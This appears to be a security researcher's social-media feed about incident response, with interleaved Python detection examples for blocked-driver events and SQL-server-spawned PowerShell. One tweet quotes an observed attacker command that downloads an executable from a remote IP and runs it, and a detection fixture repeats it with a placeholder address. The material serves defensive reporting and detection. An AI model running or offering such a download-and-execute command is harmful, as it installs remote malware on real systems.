Sr DFIR Advisor, Researcher, Practitioner. USMC vet. Author. Opinions = own. linktr.ee/keydet89 #IntrusionIntel #IObviateCompliance @HuntressLabs

Planet Earth
Joined June 2017
Pretty fascinating: bitsadm.in/blog/spying-on-us… Wrote a plugin for the pro version of RegRipper in Feb.
Harbulary Battery retweeted
Validating. We can see the following Event IDs in System.evtx, which suggests the driver was blocked, subsequently leading the service to fail:
Event ID 7045 - Service Installation
Event ID 875 - known bad driver blocked from loading
Event ID 7000 - Service Start Failure
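As an added example (not code from the tweet or from its author), the logic below correlates the three System.evtx Event IDs the tweet lists into "driver installed, blocked, service failed" sequences: for every 7045 it looks ahead a few minutes for a 7000 naming the same service and notes whether an 875 for the same image sat in between. The event records are constructed, and the field names read from each event (in particular from 875) are assumptions, not the real EVTX schema.

```python
"""Added example, not code from the tweet above: correlate System.evtx
Event IDs 7045 (service installation), 875 (blocked driver) and 7000
(service start failure) into install -> blocked -> failed sequences.
All records are constructed; the per-event field names are assumptions."""
from datetime import datetime, timedelta

# Constructed records: timestamp, Event ID, and only the fields the logic needs.
EVENTS = [
    {"time": "2023-06-02T10:00:01", "id": 7045, "service": "UpdDrv",
     "image": r"C:\Windows\System32\drivers\upd.sys", "type": "kernel mode driver"},
    {"time": "2023-06-02T10:00:02", "id": 875,
     "image": r"C:\Windows\System32\drivers\upd.sys"},
    {"time": "2023-06-02T10:00:02", "id": 7000, "service": "UpdDrv",
     "error": "constructed: blocked from loading"},
    # A service that fails to start without any block in between.
    {"time": "2023-06-02T11:30:00", "id": 7045, "service": "GoodSvc",
     "image": r"C:\Program Files\Vendor\svc.exe", "type": "user mode service"},
    {"time": "2023-06-02T11:30:04", "id": 7000, "service": "GoodSvc",
     "error": "constructed: timed out"},
    # A 7000 with no preceding 7045: ordinary noise, not reported.
    {"time": "2023-06-03T09:00:00", "id": 7000, "service": "Spooler",
     "error": "constructed: did not respond in time"},
]


def _t(stamp: str) -> datetime:
    return datetime.fromisoformat(stamp)


def correlate_service_failures(events, window=timedelta(minutes=5)):
    """For every 7045, look ahead up to `window` for a 7000 naming the same
    service. Report the pair and whether an 875 for the same image appeared
    between them (the tweet's blocked-driver case)."""
    evs = sorted(events, key=lambda e: _t(e["time"]))  # stable: ties keep log order
    findings = []
    for i, inst in enumerate(evs):
        if inst["id"] != 7045:
            continue
        blocked = False
        for later in evs[i + 1:]:
            if _t(later["time"]) - _t(inst["time"]) > window:
                break
            if later["id"] == 875 and \
                    later.get("image", "").lower() == inst["image"].lower():
                blocked = True
            elif later["id"] == 7000 and later.get("service") == inst["service"]:
                findings.append({
                    "service": inst["service"],
                    "image": inst["image"],
                    "installed": inst["time"],
                    "failed": later["time"],
                    "driver_blocked": blocked,
                    "kernel_driver": inst.get("type", "").startswith("kernel"),
                })
                break  # one failure per installation is enough
    return findings


if __name__ == "__main__":
    for f in correlate_service_failures(EVENTS):
        flag = "BLOCKED DRIVER" if f["driver_blocked"] else "start failure"
        print(f"{f['installed']}  {f['service']:<8} {f['image']}  -> {flag}")
```

Against real logs the same loop would be fed the parsed EventData of each record (service name from 7045/7000, image path from 7045 and the block event); the lookahead window is there because 7000 can lag the install by seconds on a busy host, while a 7000 hours later is more likely unrelated.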
It's that time of year, folks...people getting too close to wild animals at our state parks. Is getting that pic worth a hospital visit? Or worse, a calf being euthanized after it was rejected by the herd b/c you touched it?
Harbulary Battery retweeted
Join Harlan Carvey (@keydet89) and Ethan Tancredi for this month's episode of #TradecraftTuesday, where they'll cover what an asset inventory is and the importance of having an accurate, up-to-date inventory. hubs.ly/Q01RMySF0 #DFIR
Harbulary Battery retweeted
Fantastic blog post documenting the findings of an investigation led by fellow UK analyst @f0xtrot_sierra
At the end of May 2023, Huntress saw an up-tick in compromised TeamViewer accounts being used to install the XMRig cryptocurrency miner. Head over to our blog to hear more from our ThreatOps Center (TOC) analysts on how this threat was handled: hubs.ly/Q01RDp070
Harbulary Battery retweeted
We've seen an uptick in XMRig here at @HuntressLabs lately, in particular being used via TeamViewer #DFIR #CryptoMining #malware #MDR #EDR
Posted this to LinkedIn yesterday: windowsir.blogspot.com/2023/… Got a "like" from a "DFIR Expert", not due to content, but for the graphic. Why do I even bother??
The sad part is, the posh600.pl plugin reconstructed the PowerShell commands from the deleted batch file.
1. Batch file downloaded, run, and deleted.
2. TA makes heavy use of PowerShell.
3. PowerShell from deleted batch file reconstructed.
4. DFIR Expert "likes" it because of the picture.
Recent XMRig activity at @HuntressLabs /@Purp1eW0lf Legit TeamViewer compromised, PowerShell commands via the clipboard to download nssm and xmrig. nssm writes to Application.evtx <- Noice!
Looking at TeamViewer logs...is there a way to get the IP address of the remote system that connected to TeamViewer_Services and launched TeamViewer_Desktop?
Harbulary Battery retweeted
Are you attending the @ninjaone ITX Security Summit? Huntress is! Harlan Carvey will be speaking on a panel discussing defending against initial access and @_JohnHammond will be playing a session of Backdoors and Breaches. hubs.ly/Q01PJ7dq0
Great write-up & compilation!
#RaspberryRobin USB malware is back bby
Fridays are always fun in #DFIR... Seen several times this week:
powershell.exe Invoke-WebRequest http://103.253.43.5:30580/veems.exe -OutFile C:\ProgramData\vems.exe;C:\ProgramData\vems.exe
sqlservr.exe -> cmd.exe -> powershell.exe /1
In some instances, seeing brute forcing of MS SQL, most likely accessing xp_cmdshell. If your endpoint is running MS SQL and Veeam & is patched, look to MS SQL, use of xp_cmdshell... /2
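As an added example (not code from the thread or from its author), the detection logic below runs over constructed process-creation records and flags the two things the thread describes: the sqlservr.exe -> cmd.exe -> powershell.exe ancestry that xp_cmdshell produces, and an Invoke-WebRequest that writes a file with -OutFile and then executes that same path. The records, the placeholder URL (192.0.2.10) and the image paths are constructed; nothing here is the real telemetry from the tweet.

```python
"""Added example, not code from the thread above: flag the
sqlservr.exe -> cmd.exe -> powershell.exe chain and the
"Invoke-WebRequest ... -OutFile <path>;<path>" download-then-run pattern
over constructed process-creation records."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str    # full image path
    cmdline: str


# Constructed records (Sysmon EID 1 / 4688-style fields, reduced). The IWR
# command mirrors the shape in the tweet with a documentation IP swapped in.
SAMPLE = [
    Proc(1000, 500, r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
         "sqlservr.exe -sMSSQLSERVER"),
    Proc(1200, 1000, r"C:\Windows\System32\cmd.exe",
         r"cmd.exe /c powershell.exe Invoke-WebRequest http://192.0.2.10:8080/veems.exe -OutFile C:\ProgramData\vems.exe;C:\ProgramData\vems.exe"),
    Proc(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"powershell.exe Invoke-WebRequest http://192.0.2.10:8080/veems.exe -OutFile C:\ProgramData\vems.exe;C:\ProgramData\vems.exe"),
    Proc(1400, 1300, r"C:\ProgramData\vems.exe", r"C:\ProgramData\vems.exe"),
    # Benign: an admin launching PowerShell from Explorer.
    Proc(2000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(2100, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe Get-Process"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(procs, pid):
    """Image basenames from `pid` up through its parents, child first."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


# xp_cmdshell executes through cmd.exe, so this is the ancestry to look for.
SQL_SHELL_CHAIN = ["powershell.exe", "cmd.exe", "sqlservr.exe"]

# Invoke-WebRequest <url> ... -OutFile <path>;<same path>: download, then run it.
DOWNLOAD_RUN = re.compile(
    r"(?i)invoke-webrequest\s+(?P<url>\S+).*?-outfile\s+(?P<path>[^\s;]+)\s*;\s*(?P=path)")


def find_suspicious(procs):
    images_seen = {p.image.lower() for p in procs}
    hits = []
    for p in procs:
        chain = ancestry(procs, p.pid)
        if chain[:3] == SQL_SHELL_CHAIN:
            hits.append({"pid": p.pid, "rule": "sqlservr-cmd-powershell",
                         "detail": " -> ".join(reversed(chain[:3]))})
        m = DOWNLOAD_RUN.search(p.cmdline)
        if m and basename(p.image) == "powershell.exe":
            dropped = m.group("path")
            hits.append({"pid": p.pid, "rule": "iwr-download-and-run",
                         "detail": f"{m.group('url')} -> {dropped}",
                         # Did the dropped path actually start as a process?
                         "dropped_file_ran": dropped.lower() in images_seen})
    return hits


if __name__ == "__main__":
    for h in find_suspicious(SAMPLE):
        print(h)
```

The ancestry check is the higher-signal one: sqlservr.exe has little business spawning cmd.exe at all, so on a host running MS SQL that alone is worth a look, and the download-and-run match then tells you what was fetched and whether the dropped file went on to execute.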
New MCMAP...
Neck to Neck Combat. Male giraffes will engage in bouts known as "necking", where they will stand beside each other and swing their necks wildly. 🦒🦒
Some thoughts on SOC/DFIR analyst validation of findings: windowsir.blogspot.com/2023/…